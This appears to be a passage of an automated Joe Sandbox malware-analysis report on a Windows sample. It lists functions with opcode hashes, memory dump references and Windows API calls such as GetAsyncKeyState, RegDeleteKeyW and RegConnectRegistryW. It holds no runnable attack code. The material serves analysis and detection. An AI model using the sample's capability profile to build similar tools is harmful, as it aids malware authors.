                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3488606520-0
                                                                                                                                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 15295421-0
                                                                                                                                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                              APIs
                                                                                                                                              • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3539004672-0
                                                                                                                                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                              APIs
                                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 327565842-0
                                                                                                                                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2832842796-0
                                                                                                                                              • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                              • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                                                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum$CloseDeleteOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2095303065-0
                                                                                                                                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                              APIs
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: RectWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 861336768-0
                                                                                                                                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32 ref: 00449598
                                                                                                                                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                              • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                              • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1856069659-0
                                                                                                                                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                                              APIs
                                                                                                                                              • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                              • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                              • TrackPopupMenuEx.USER32(030164D0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1300944170-0
                                                                                                                                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                              • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1822080540-0
                                                                                                                                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                              APIs
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 659298297-0
                                                                                                                                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                              APIs
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(03011B60,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(03011B60,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 142311417-0
                                                                                                                                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
